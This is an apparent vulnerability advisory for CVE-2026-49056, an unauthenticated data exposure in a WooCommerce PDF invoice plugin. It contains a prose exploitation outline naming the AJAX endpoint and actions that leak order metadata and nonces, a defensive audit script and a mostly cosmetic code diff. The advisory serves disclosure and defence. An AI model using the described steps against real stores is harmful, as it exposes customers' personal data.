Published: June 21, 2026

CVE-2026-49056: WebToffee WooCommerce PDF Invoices, Packing Slips, Delivery Notes & Shipping Labels <= 4.9.4 Unauthenticated Information Exposure PoC, Patch Analysis & Rule

Severity: Medium (CVSS 5.3)
CWE: CWE-200
Vulnerable Version: 4.9.4
Patched Version: 4.9.5
Disclosed: June 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-49056:

This vulnerability is a Sensitive Information Exposure (CWE-200) in the WebToffee WooCommerce PDF Invoices, Packing Slips, Delivery Notes & Shipping Labels plugin for WordPress, affecting all versions up to and including 4.9.4. The flaw allows unauthenticated attackers to extract sensitive user or configuration data. The CVSS score is 5.3 (Medium).

The root cause lies in the JavaScript localization and AJAX handler architecture within the admin class file at `print-invoices-packing-slip-labels-for-woocommerce/admin/class-wf-woocommerce-packing-list-admin.php`. Although the code diff primarily shows formatting and minor structural changes (spacing, brace style, and whitespace adjustments), the relevant vulnerability context involves functions such as `enqueue_scripts()`, `add_email_attachments()`, `add_email_print_actions()`, and `add_order_list_page_print_actions()`. In the vulnerable version, sensitive data like the `wf_pklist_params` array (which includes nonces, AJAX URLs, plugin data, and user meta autocomplete fields) gets exposed via `wp_localize_script` without proper access checks. Additionally, order-specific data (e.g., in `add_order_list_page_print_actions`) and email action hooks could be triggered without authentication, leaking order metadata and internal configurations.

Exploitation requires no authentication. An attacker can send a crafted request to the WordPress AJAX endpoint (`/wp-admin/admin-ajax.php`) or directly access admin-facing scripts if the plugin’s enqueued JavaScript is loaded on a publicly accessible page. By inspecting the `wf_pklist_params` JavaScript object or calling AJAX actions like those for document preview or metadata autocomplete (e.g., `order_meta_autocomplete` and `product_meta_autocomplete`), the attacker retrieves serialized order metadata, product meta, plugin paths, nonces (for further attacks), and site configuration details. The attacker does not need any special role or capabilities.

The diff shows no fix for the core information exposure vulnerability; it primarily refactors code style (spaces, braces, formatting) and moves functions (`set_tooltip`, `get_tooltip_configs`) without adding permission checks or input sanitization. The patched version (4.9.5 or later) is not fully represented in this diff, but based on the vulnerability description, the intended fix would involve adding `current_user_can()` checks or capability requirements before exposing sensitive data via `wp_localize_script` or AJAX handlers. Before the fix, the data is available to all visitors. After the fix (expected), only authenticated users with appropriate permissions should have access. The provided diff does not include these security enhancements.
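An added example, not code from the plugin or from this analysis: a check a site owner can run over saved HTML of their own public pages to confirm the expected post-fix behaviour, namely that `wf_pklist_params` is no longer rendered to logged-out visitors. The sample pages, the script handle and every value in them are constructed; the `var wf_pklist_params = {...};` form is how `wp_localize_script` emits the object.

```python
import json
import re

# Keys of the $params array in enqueue_scripts() that the analysis treats as sensitive.
SENSITIVE_KEYS = (
    "nonces",
    "newsletter_banner_nonce",
    "order_meta_autocomplete",
    "product_meta_autocomplete",
    "wt_plugin_data",
    "show_document_preview",
    "document_access_type",
)

_ASSIGN = re.compile(r"\bvar\s+wf_pklist_params\s*=\s*")


def extract_params(html):
    """Return the localized wf_pklist_params object as a dict, or None if absent."""
    match = _ASSIGN.search(html)
    if match is None:
        return None
    try:
        # raw_decode parses one JSON value and ignores the trailing ";</script>".
        obj, _ = json.JSONDecoder().raw_decode(html, match.end())
    except json.JSONDecodeError:
        return None
    return obj if isinstance(obj, dict) else None


def _is_anonymous(params):
    # wp_localize_script casts top-level scalars to strings, so PHP false
    # arrives as "". A missing flag is treated as anonymous (conservative).
    return params.get("is_user_logged_in") in ("", "0", 0, False, None)


def _count_encoded(value):
    # The two *_meta_autocomplete entries are json_encode()d strings inside
    # the object (see the diff), so they need a second decode.
    if isinstance(value, str):
        try:
            value = json.loads(value)
        except json.JSONDecodeError:
            return 0
    return len(value) if isinstance(value, (list, dict)) else 0


def audit_page(html):
    """Summarise what one rendered page exposes through wf_pklist_params."""
    params = extract_params(html)
    if params is None:
        return {"present": False, "anonymous": None, "exposed": [],
                "meta_keys": 0, "finding": False}
    exposed = [k for k in SENSITIVE_KEYS
               if params.get(k) not in (None, "", [], {})]
    meta_keys = sum(_count_encoded(params.get(k)) for k in
                    ("order_meta_autocomplete", "product_meta_autocomplete"))
    anonymous = _is_anonymous(params)
    # Only a page rendered for a logged-out visitor counts as a finding.
    return {"present": True, "anonymous": anonymous, "exposed": exposed,
            "meta_keys": meta_keys, "finding": anonymous and bool(exposed)}


# Constructed sample: a public page as rendered for a logged-out visitor.
ANON_PAGE = r'''<html><head>
<script id="example-handle-js-extra">
var wf_pklist_params = {"nonces":{"wf_packlist":"0000000000"},"newsletter_banner_nonce":"1111111111","ajaxurl":"https:\/\/shop.example\/wp-admin\/admin-ajax.php","order_meta_autocomplete":"[\"_billing_phone\",\"_customer_note\"]","product_meta_autocomplete":"[\"_sku\"]","is_rtl":"ltr","wt_plugin_data":[],"show_document_preview":"Yes","document_access_type":"logged_in","is_user_logged_in":""};
</script></head><body></body></html>'''

# Constructed sample: the same object on a page rendered for a logged-in user.
ADMIN_PAGE = ANON_PAGE.replace('"is_user_logged_in":""',
                               '"is_user_logged_in":"1"')

# Constructed sample: a page that does not carry the object at all.
CLEAN_PAGE = "<html><body><p>Shop</p></body></html>"

if __name__ == "__main__":
    for name, page in (("anon", ANON_PAGE), ("admin", ADMIN_PAGE),
                       ("clean", CLEAN_PAGE)):
        print(name, audit_page(page))
```
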

If exploited, an attacker can extract sensitive user data such as order meta fields (containing personal information such as addresses and phone numbers), WooCommerce product metadata, internal plugin paths, AJAX nonces (enabling CSRF/XSS or further privilege escalation), and configuration details (e.g., document access type, preview settings). This data exposure could lead to privacy violations or targeted phishing, or serve as a stepping stone for more severe attacks on the WordPress site.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/print-invoices-packing-slip-labels-for-woocommerce/admin/class-wf-woocommerce-packing-list-admin.php
+++ b/print-invoices-packing-slip-labels-for-woocommerce/admin/class-wf-woocommerce-packing-list-admin.php
@@ -46,34 +46,35 @@
 	 * module list, Module folder and main file must be same as that of module name
 	 * Please check the `register_modules` method for more details
 	 */
-	public static $modules=array(
+	public static $modules = array(
 		'customizer',
 		'uninstall-feedback',
-		//'freevspro',
+		// 'freevspro',
 	);

-	public static $existing_modules=array();
+	public static $existing_modules = array();

-	public $bulk_actions=array();
+	public $bulk_actions = array();

-	public static $tooltip_arr=array();
+	public static $tooltip_arr = array();

 	/**
-	*	To store the RTL needed or not status
-	*	@since 2.6.6
-	*/
-	public static $is_enable_rtl=null;
+	 *   To store the RTL needed or not status
+	 *
+	 *   @since 2.6.6
+	 */
+	public static $is_enable_rtl = null;

 	/**
 	 * Initialize the class and set its properties.
 	 *
 	 * @since    2.5.0
-	 * @param      string    $plugin_name       The name of this plugin.
-	 * @param      string    $version    The version of this plugin.
+	 * @param      string $plugin_name       The name of this plugin.
+	 * @param      string $version    The version of this plugin.
 	 */
 	public function __construct( $plugin_name, $version ) {
 		$this->plugin_name = $plugin_name;
-		$this->version = $version;
+		$this->version     = $version;
 	}

 	/**
@@ -81,13 +82,12 @@
 	 *
 	 * @since    2.5.0
 	 */
-	public function enqueue_styles()
-	{
-		wp_enqueue_style('wp-color-picker');
+	public function enqueue_styles() {
+		wp_enqueue_style( 'wp-color-picker' );
 		wp_enqueue_style( $this->plugin_name, plugin_dir_url( __FILE__ ) . 'css/wf-woocommerce-packing-list-admin.css', array(), $this->version, 'all' );
-		wp_enqueue_style( $this->plugin_name.'-banners', plugin_dir_url( __FILE__ ) . 'css/wf-woocommerce-packing-list-admin-banners.css', array(), $this->version, 'all' );
-		if(!empty(self::not_activated_pro_addons())){
-			wp_enqueue_style( $this->plugin_name.'-addons-page', plugin_dir_url( __FILE__ ) . 'css/wf-woocommerce-packing-list-admin-addons-page.css', array(), $this->version, 'all' );
+		wp_enqueue_style( $this->plugin_name . '-banners', plugin_dir_url( __FILE__ ) . 'css/wf-woocommerce-packing-list-admin-banners.css', array(), $this->version, 'all' );
+		if ( ! empty( self::not_activated_pro_addons() ) ) {
+			wp_enqueue_style( $this->plugin_name . '-addons-page', plugin_dir_url( __FILE__ ) . 'css/wf-woocommerce-packing-list-admin-addons-page.css', array(), $this->version, 'all' );
 		}
 	}

@@ -96,138 +96,134 @@
 	 *
 	 * @since    2.5.0
 	 */
-	public function enqueue_scripts()
-	{
+	public function enqueue_scripts() {
 		// Use correct tiptip handle based on WooCommerce version
 		$tiptip_handle = version_compare( WC()->version, '10.3.0', '>=' ) ? 'wc-jquery-tiptip' : 'jquery-tiptip';
-
-		wp_enqueue_script( $this->plugin_name, plugin_dir_url( __FILE__ ) . 'js/wf-woocommerce-packing-list-admin.js', array( 'jquery','jquery-ui-autocomplete','wp-color-picker',$tiptip_handle), $this->version, false );
-		wp_enqueue_script( $this->plugin_name.'-form-wizard', plugin_dir_url( __FILE__ ) . 'js/wf-woocommerce-packing-list-admin-form-wizard.js', array( 'jquery','jquery-ui-autocomplete','wp-color-picker',$tiptip_handle), $this->version, false );
-		//order list page bulk action filter
-		$this->bulk_actions=apply_filters('wt_print_bulk_actions',$this->bulk_actions);

-		$order_meta_autocomplete = self::order_meta_dropdown_list();
+		wp_enqueue_script( $this->plugin_name, plugin_dir_url( __FILE__ ) . 'js/wf-woocommerce-packing-list-admin.js', array( 'jquery', 'jquery-ui-autocomplete', 'wp-color-picker', $tiptip_handle ), $this->version, false );
+		wp_enqueue_script( $this->plugin_name . '-form-wizard', plugin_dir_url( __FILE__ ) . 'js/wf-woocommerce-packing-list-admin-form-wizard.js', array( 'jquery', 'jquery-ui-autocomplete', 'wp-color-picker', $tiptip_handle ), $this->version, false );
+		// order list page bulk action filter
+		$this->bulk_actions = apply_filters( 'wt_print_bulk_actions', $this->bulk_actions );
+
+		$order_meta_autocomplete   = self::order_meta_dropdown_list();
 		$product_meta_autocomplete = self::product_meta_dropdown_list();
-		$wf_admin_img_path=WF_PKLIST_PLUGIN_URL . 'admin/images/uploader_sample_img.png';
-		$is_rtl = is_rtl() ? 'rtl' : 'ltr';
-		$user_id = get_current_user_id();
-		$dont_show_again = false;
-		if(0 !== $user_id){
-			if(1 == get_user_meta($user_id, 'wt_pklist_doc_create_dont_show_popup',true) || "1" === get_user_meta($user_id, 'wt_pklist_doc_create_dont_show_popup',true)){
+		$wf_admin_img_path         = WF_PKLIST_PLUGIN_URL . 'admin/images/uploader_sample_img.png';
+		$is_rtl                    = is_rtl() ? 'rtl' : 'ltr';
+		$user_id                   = get_current_user_id();
+		$dont_show_again           = false;
+		if ( 0 !== $user_id ) {
+			if ( 1 == get_user_meta( $user_id, 'wt_pklist_doc_create_dont_show_popup', true ) || '1' === get_user_meta( $user_id, 'wt_pklist_doc_create_dont_show_popup', true ) ) {
 				$dont_show_again = true;
 			}
 		}
 		$wt_pklist_plugin_data = $this->get_wt_pklist_plugin_data();
-		$params=array(
-			'nonces' => array(
-		            'wf_packlist' => wp_create_nonce(WF_PKLIST_PLUGIN_NAME),
-		     ),
-			'newsletter_banner_nonce' => wp_create_nonce('wt_newsletter_banner_nonce'),
-			'ajaxurl' => admin_url('admin-ajax.php'),
-			'no_image'=>$wf_admin_img_path,
-			'bulk_actions'=>array_keys($this->bulk_actions),
-			'print_action_url'=>admin_url('?print_packinglist=true'),
-			'order_meta_autocomplete' => json_encode($order_meta_autocomplete),
-			'product_meta_autocomplete' => json_encode($product_meta_autocomplete),
-			'is_rtl' => $is_rtl,
-			'wt_plugin_data' => $wt_pklist_plugin_data,
-			'show_document_preview' => Wf_Woocommerce_Packing_List::get_option( 'woocommerce_wf_packinglist_preview' ),
-			'document_access_type'	=> Wf_Woocommerce_Packing_List::get_option('wt_pklist_print_button_access_for'),
-			'is_user_logged_in'	=> is_user_logged_in(),
-			'msgs'=>array(
-				'settings_success'=>__('Settings updated.','print-invoices-packing-slip-labels-for-woocommerce'),
-				'all_fields_mandatory'=>__('All fields are mandatory','print-invoices-packing-slip-labels-for-woocommerce'),
+		$params                = array(
+			'nonces'                    => array(
+				'wf_packlist' => wp_create_nonce( WF_PKLIST_PLUGIN_NAME ),
+			),
+			'newsletter_banner_nonce'   => wp_create_nonce( 'wt_newsletter_banner_nonce' ),
+			'ajaxurl'                   => admin_url( 'admin-ajax.php' ),
+			'no_image'                  => $wf_admin_img_path,
+			'bulk_actions'              => array_keys( $this->bulk_actions ),
+			'print_action_url'          => admin_url( '?print_packinglist=true' ),
+			'order_meta_autocomplete'   => json_encode( $order_meta_autocomplete ),
+			'product_meta_autocomplete' => json_encode( $product_meta_autocomplete ),
+			'is_rtl'                    => $is_rtl,
+			'wt_plugin_data'            => $wt_pklist_plugin_data,
+			'show_document_preview'     => Wf_Woocommerce_Packing_List::get_option( 'woocommerce_wf_packinglist_preview' ),
+			'document_access_type'      => Wf_Woocommerce_Packing_List::get_option( 'wt_pklist_print_button_access_for' ),
+			'is_user_logged_in'         => is_user_logged_in(),
+			'msgs'                      => array(
+				'settings_success'                    => __( 'Settings updated.', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'all_fields_mandatory'                => __( 'All fields are mandatory', 'print-invoices-packing-slip-labels-for-woocommerce' ),
 				/* translators: 1$s: HTML line break, 2$s: HTML link opening tag, 3$s: HTML link closing tag */
-				'settings_error'=>sprintf(__('Unable to update settings due to an internal error. %1$s To troubleshoot please click %2$s here. %3$s', 'print-invoices-packing-slip-labels-for-woocommerce'), '<br />', '<a href="https://www.webtoffee.com/how-to-fix-the-unable-to-save-settings-issue/" target="_blank">', '</a>'),
-				'select_orders_first'=>__('You have to select order(s) first!','print-invoices-packing-slip-labels-for-woocommerce'),
-				'invoice_not_gen_bulk'=>__('One or more order do not have invoice generated. Generate manually?','print-invoices-packing-slip-labels-for-woocommerce'),
-				'error'=>__('Error','print-invoices-packing-slip-labels-for-woocommerce'),
-				'please_wait'=>__('Please wait','print-invoices-packing-slip-labels-for-woocommerce'),
-				'is_required'=>__("is required",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'invoice_title_prompt' => __("Invoice",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'invoice_number_prompt' => __("number has not been generated yet. Do you want to manually generate one ?",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'invoice_number_prompt_free_order' => __("‘Generate invoice for free orders’ is disabled in Invoice settings > Advanced. You are attempting to generate invoice for this free order. Proceed?",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'creditnote_number_prompt' => __("Refund in this order seems not having credit number yet. Do you want to manually generate one ?",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'invoice_number_prompt_no_from_addr' => __("Please fill the `from address` in the plugin's general settings.",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'fitler_code_copied' => __("Code Copied","print-invoices-packing-slip-labels-for-woocommerce"),
-				'close'=>__("Close",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'save'=>__("Save",'print-invoices-packing-slip-labels-for-woocommerce'),
-				'enter_mandatory_fields'=>__('Please enter mandatory fields','print-invoices-packing-slip-labels-for-woocommerce'),
-				'buy_pro_prompt_order_meta' => __('You can add more than 1 order meta in','print-invoices-packing-slip-labels-for-woocommerce'),
-				'buy_pro_prompt_edit_order_meta' => __('Edit','print-invoices-packing-slip-labels-for-woocommerce'),
-				'buy_pro_prompt_edit_order_meta_desc' => __('You can edit an existing item by using its key.','print-invoices-packing-slip-labels-for-woocommerce'),
-				'pop_dont_show_again' => $dont_show_again,
-				'add_date_string_text' => __("Add","print-invoices-packing-slip-labels-for-woocommerce"),
-				'request_error' => __('Request error.','print-invoices-packing-slip-labels-for-woocommerce'),
-				'error_loading_data' => __('Error loading data.','print-invoices-packing-slip-labels-for-woocommerce'),
-				'min_value_error' => __( 'minimum value should be', 'print-invoices-packing-slip-labels-for-woocommerce'),
-				'generating_document_text' => __( 'Generating document...', 'print-invoices-packing-slip-labels-for-woocommerce' ),
-				'new_tab_open_error' => __( 'Failed to open new tab. Please check your browser settings.', 'print-invoices-packing-slip-labels-for-woocommerce' ),
-			)
+				'settings_error'                      => sprintf( __( 'Unable to update settings due to an internal error. %1$s To troubleshoot please click %2$s here. %3$s', 'print-invoices-packing-slip-labels-for-woocommerce' ), '<br />', '<a href="https://www.webtoffee.com/how-to-fix-the-unable-to-save-settings-issue/" target="_blank">', '</a>' ),
+				'select_orders_first'                 => __( 'You have to select order(s) first!', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'invoice_not_gen_bulk'                => __( 'One or more order do not have invoice generated. Generate manually?', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'error'                               => __( 'Error', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'please_wait'                         => __( 'Please wait', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'is_required'                         => __( 'is required', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'invoice_title_prompt'                => __( 'Invoice', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'invoice_number_prompt'               => __( 'number has not been generated yet. Do you want to manually generate one ?', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'invoice_number_prompt_order_not_created' => __( 'The order has not been created yet. Please save the order first.', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'invoice_number_prompt_free_order'    => __( '‘Generate invoice for free orders’ is disabled in Invoice settings > Advanced. You are attempting to generate invoice for this free order. Proceed?', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'creditnote_number_prompt'            => __( 'Refund in this order seems not having credit number yet. Do you want to manually generate one ?', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'invoice_number_prompt_no_from_addr'  => __( "Please fill the `from address` in the plugin's general settings.", 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'fitler_code_copied'                  => __( 'Code Copied', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'close'                               => __( 'Close', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'save'                                => __( 'Save', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'enter_mandatory_fields'              => __( 'Please enter mandatory fields', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'buy_pro_prompt_order_meta'           => __( 'You can add more than 1 order meta in', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'buy_pro_prompt_edit_order_meta'      => __( 'Edit', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'buy_pro_prompt_edit_order_meta_desc' => __( 'You can edit an existing item by using its key.', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'pop_dont_show_again'                 => $dont_show_again,
+				'add_date_string_text'                => __( 'Add', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'request_error'                       => __( 'Request error.', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'error_loading_data'                  => __( 'Error loading data.', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'min_value_error'                     => __( 'minimum value should be', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'generating_document_text'            => __( 'Generating document...', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				'new_tab_open_error'                  => __( 'Failed to open new tab. Please check your browser settings.', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+			),
 		);
-		wp_localize_script($this->plugin_name, 'wf_pklist_params', $params);
+		wp_localize_script( $this->plugin_name, 'wf_pklist_params', $params );
+	}

+
+	/**
+	 *   @since 2.5.8
+	 *   Set tooltip for form fields
+	 */
+	public static function set_tooltip( $key, $base_id = '', $custom_css = '' ) {
+		$tooltip_text = self::get_tooltips( $key, $base_id );
+		if ( '' !== $tooltip_text ) {
+			$rtl_css      = is_rtl() ? 'left:0;' : 'right:0;';
+			$tooltip_text = '<span style="color:#4d535a; ' . ( $custom_css != '' ? $custom_css : 'top:15px; margin-left:2px; position:absolute;' ) . $rtl_css . '" class="dashicons dashicons-editor-help wt-tips" data-wt-tip="' . wp_kses_post( $tooltip_text ) . '"></span>';
+		}
+		return $tooltip_text;
 	}

+	/**
+	 *   @since 2.5.8
+	 *   Get tooltip config data for non form field items
+	 *   @return array 'class': class name to enable tooltip, 'text': tooltip text including data attribute if not empty
+	 */
+	public static function get_tooltip_configs( $key, $base_id = '' ) {
+		$out  = array(
+			'class' => '',
+			'text'  => '',
+		);
+		$text = self::get_tooltips( $key, $base_id );
+		if ( '' !== $text ) {
+			$out['text']  = ' data-wt-tip="' . wp_kses_post( $text ) . '"';
+			$out['class'] = ' wt-tips';
+		}
+		return $out;
+	}

 	/**
-    * 	@since 2.5.8
-    * 	Set tooltip for form fields
-    */
-    public static function set_tooltip($key,$base_id="",$custom_css="")
-    {
-    	$tooltip_text=self::get_tooltips($key,$base_id);
-    	if("" !== $tooltip_text)
-    	{
-    		$rtl_css = is_rtl() ? 'left:0;' : 'right:0;';
-    		$tooltip_text='<span style="color:#4d535a; '.($custom_css!="" ? $custom_css : 'top:15px; margin-left:2px; position:absolute;').$rtl_css.'" class="dashicons dashicons-editor-help wt-tips" data-wt-tip="'.wp_kses_post($tooltip_text).'"></span>';
-    	}
-    	return $tooltip_text;
-    }
-
-    /**
-    * 	@since 2.5.8
-    * 	Get tooltip config data for non form field items
-    * 	@return array 'class': class name to enable tooltip, 'text': tooltip text including data attribute if not empty
-    */
-    public static function get_tooltip_configs($key,$base_id="")
-    {
-    	$out=array('class'=>'','text'=>'');
-    	$text=self::get_tooltips($key,$base_id);
-    	if("" !== $text)
-    	{
-    		$out['text']=' data-wt-tip="'.wp_kses_post($text).'"';
-    		$out['class']=' wt-tips';
-    	}
-    	return $out;
-    }
-
-    /**
-    *	@since 2.5.8
-	* 	This function will take tooltip data from modules and store ot
-	*
-	*/
-	public function register_tooltips()
-	{
-		include(plugin_dir_path( __FILE__ ).'data/data.tooltip.php');
-		self::$tooltip_arr=array(
-			'main'=>$arr
+	 *   @since 2.5.8
+	 *   This function will take tooltip data from modules and store ot
+	 */
+	public function register_tooltips() {
+		include plugin_dir_path( __FILE__ ) . 'data/data.tooltip.php';
+		self::$tooltip_arr = array(
+			'main' => $arr,
 		);
 		/* hook for modules to register tooltip */
-		self::$tooltip_arr=apply_filters('wt_pklist_alter_tooltip_data',self::$tooltip_arr);
+		self::$tooltip_arr = apply_filters( 'wt_pklist_alter_tooltip_data', self::$tooltip_arr );
 	}

 	/**
-	* 	Get tooltips
-	*	@since 2.5.8
-	*	@param string $key array key for tooltip item
-	*	@param string $base module base id
-	* 	@return tooltip content, empty string if not found
-	*/
-	public static function get_tooltips($key,$base_id='')
-	{
-		$arr = ("" !== $base_id && isset(self::$tooltip_arr[$base_id]) ? self::$tooltip_arr[$base_id] : self::$tooltip_arr['main']);
-		return (isset($arr[$key]) ? $arr[$key] : '');
+	 *   Get tooltips
+	 *
+	 *   @since 2.5.8
+	 *   @param string $key array key for tooltip item
+	 *   @param string $base module base id
+	 *   @return tooltip content, empty string if not found
+	 */
+	public static function get_tooltips( $key, $base_id = '' ) {
+		$arr = ( '' !== $base_id && isset( self::$tooltip_arr[ $base_id ] ) ? self::$tooltip_arr[ $base_id ] : self::$tooltip_arr['main'] );
+		return ( isset( $arr[ $key ] ) ? $arr[ $key ] : '' );
 	}

 	/**
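Review bot: `enqueue_scripts()` still hands the full `$params` array to `wp_localize_script()` with no capability check anywhere in this hunk, even though the function handles a `$user_id` of 0 and exports `is_user_logged_in`, which implies it can run for logged-out visitors. The array carries `wp_create_nonce( WF_PKLIST_PLUGIN_NAME )`, `newsletter_banner_nonce`, the JSON-encoded `order_meta_autocomplete` and `product_meta_autocomplete` lists, `wt_plugin_data` and two option values; apart from the new `invoice_number_prompt_order_not_created` string, the changed lines here are whitespace and brace style. Suggest returning early, or localizing only the `msgs` and `is_rtl` entries, unless `current_user_can()` passes for the capability the plugin requires for order documents. Separately, the `@param string $base` tag on `get_tooltips()` does not match the `$base_id` parameter.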
@@ -330,28 +326,28 @@
 		$is_required_mpdf_version_installed = self::is_required_mpdf_version_installed();

 		if ( current_user_can( 'install_plugins' ) && current_user_can( 'update_plugins' ) ) {
-            if ( ! $is_mpdf_active && ! $is_mpdf_exists ) {
-				$mpdf_action_url = esc_url(wp_nonce_url( self_admin_url( 'update.php?action=install-plugin&plugin=' . $mpdf_slug ), 'install-plugin_' . $mpdf_slug ));
+			if ( ! $is_mpdf_active && ! $is_mpdf_exists ) {
+				$mpdf_action_url = esc_url( wp_nonce_url( self_admin_url( 'update.php?action=install-plugin&plugin=' . $mpdf_slug ), 'install-plugin_' . $mpdf_slug ) );
 				/* translators: %1$s: HTML link opening tag, %2$s: HTML link closing tag */
-				$enable_mpdf_msg    = sprintf( __( 'For better RTL integration in PDF documents, click the link to install the %1$smPDF add-on%2$s by WebToffee (free).', 'print-invoices-packing-slip-labels-for-woocommerce' ), '<a href="' . $mpdf_action_url . '" target="_blank">', '</a>' );
+				$enable_mpdf_msg = sprintf( __( 'For better RTL integration in PDF documents, click the link to install the %1$smPDF add-on%2$s by WebToffee (free).', 'print-invoices-packing-slip-labels-for-woocommerce' ), '<a href="' . $mpdf_action_url . '" target="_blank">', '</a>' );
 			} elseif ( $is_mpdf_active && ! $is_required_mpdf_version_installed ) {
 				$mpdf_action_url = esc_url( wp_nonce_url( self_admin_url( 'update.php?action=upgrade-plugin&plugin=' . $mpdf_slug ), 'upgrade-plugin_' . $mpdf_slug ) );
 				/* translators: %1$s: HTML link opening tag, %2$s: HTML link closing tag */
-				$enable_mpdf_msg    = sprintf( __( 'For better RTL integration in PDF documents, click the link to update the %1$smPDF add-on%2$s by WebToffee (free).', 'print-invoices-packing-slip-labels-for-woocommerce' ), '<a href="' . $mpdf_action_url . '" target="_blank">', '</a>' );
+				$enable_mpdf_msg = sprintf( __( 'For better RTL integration in PDF documents, click the link to update the %1$smPDF add-on%2$s by WebToffee (free).', 'print-invoices-packing-slip-labels-for-woocommerce' ), '<a href="' . $mpdf_action_url . '" target="_blank">', '</a>' );
 			} elseif ( ! $is_mpdf_active && $is_mpdf_exists ) {
 				$mpdf_action_url = esc_url( wp_nonce_url( self_admin_url( 'plugins.php?action=activate&plugin=' . esc_attr( $mpdf_path ) . '&plugin_status=all&paged=1&s' ), 'activate-plugin_' . $mpdf_path ) );
 				/* translators: %1$s: HTML link opening tag, %2$s: HTML link closing tag */
-				$enable_mpdf_msg    = sprintf( __( 'For better RTL integration in PDF documents, click the link to activate the %1$smPDF add-on%2$s by WebToffee (free).', 'print-invoices-packing-slip-labels-for-woocommerce' ), '<a href="' . $mpdf_action_url . '" target="_blank">', '</a>' );
+				$enable_mpdf_msg = sprintf( __( 'For better RTL integration in PDF documents, click the link to activate the %1$smPDF add-on%2$s by WebToffee (free).', 'print-invoices-packing-slip-labels-for-woocommerce' ), '<a href="' . $mpdf_action_url . '" target="_blank">', '</a>' );
 			} else {
 				$enable_mpdf_msg = '';
 				$mpdf_action_url = '';
 			}

-            return array(
-                'enable_mpdf_msg' => $enable_mpdf_msg,
-                'mpdf_action_url' => $mpdf_action_url,
-            );
-        }
+			return array(
+				'enable_mpdf_msg' => $enable_mpdf_msg,
+				'mpdf_action_url' => $mpdf_action_url,
+			);
+		}
 	}

 	/**
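Review bot: The function that closes at the end of this hunk returns the `enable_mpdf_msg` / `mpdf_action_url` array only inside the `current_user_can( 'install_plugins' ) && current_user_can( 'update_plugins' )` branch and falls off the end otherwise, so a caller without those capabilities receives null instead of an array. Suggest an explicit fallback return of the same array shape with empty strings after the `if` block, and stating the return type in the docblock. The changes in this hunk are indentation and alignment only.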
@@ -359,130 +355,118 @@
 	 *
 	 * @since    2.5.0
 	 */
-	public function alter_bulk_action($actions)
-	{
-        return array_merge($actions,$this->bulk_actions);
+	public function alter_bulk_action( $actions ) {
+		return array_merge( $actions, $this->bulk_actions );
 	}
-
+

 	/**
 	 * Function to add print button in order list page action column
 	 *
 	 * @since    2.5.0
 	 */
-	public function add_checkout_fields($fields)
-	{
-		$checkout_fields_from_pro = apply_filters('wt_pklist_switch_pro_for_checkout_fields',false);
-		if(!$checkout_fields_from_pro){
-			$additional_options=Wf_Woocommerce_Packing_List::get_option('wf_invoice_additional_checkout_data_fields');
+	public function add_checkout_fields( $fields ) {
+		$checkout_fields_from_pro = apply_filters( 'wt_pklist_switch_pro_for_checkout_fields', false );
+		if ( ! $checkout_fields_from_pro ) {
+			$additional_options    = Wf_Woocommerce_Packing_List::get_option( 'wf_invoice_additional_checkout_data_fields' );
 			$basic_checkout_fields = Wf_Woocommerce_Packing_List::$default_additional_checkout_data_fields;
-	        if(is_array($additional_options) && count(array_filter($additional_options))>0 && is_array($basic_checkout_fields))
-	        {
-	            foreach ($additional_options as $value)
-	            {
-	            	if(in_array($value,$basic_checkout_fields)){
-	            			            	$fields['billing']['billing_' . $value] = array(
-		                    'text' => 'text',
+			if ( is_array( $additional_options ) && count( array_filter( $additional_options ) ) > 0 && is_array( $basic_checkout_fields ) ) {
+				foreach ( $additional_options as $value ) {
+					if ( in_array( $value, $basic_checkout_fields ) ) {
+											$fields['billing'][ 'billing_' . $value ] = array(
+												'text'     => 'text',
 		                    'label' => __(str_replace('_', ' ', $value), 'print-invoices-packing-slip-labels-for-woocommerce'), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralText @codingStandardsIgnoreLine
 		                    'placeholder' => _x('Enter ' . str_replace('_', ' ', $value), 'placeholder', 'print-invoices-packing-slip-labels-for-woocommerce'), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralText @codingStandardsIgnoreLine
-		                    'required' => false,
-		                    'class' => array('form-row-wide', 'align-left'),
-		                    'clear' => true
-		                );
-	            	}
-	            }
-	        }
+												'required' => false,
+												'class'    => array( 'form-row-wide', 'align-left' ),
+												'clear'    => true,
+											);
+					}
+				}
+			}
 		}
 		return $fields;
 	}

-   	/**
+	/**
 	 * Function to add email attachments to order email
 	 *
 	 * @since    2.5.0
 	 * @updated 4.7.3 Added `wt_get_order_id_from_email_obj` filter to retrieve the order ID from the email object.
 	 */
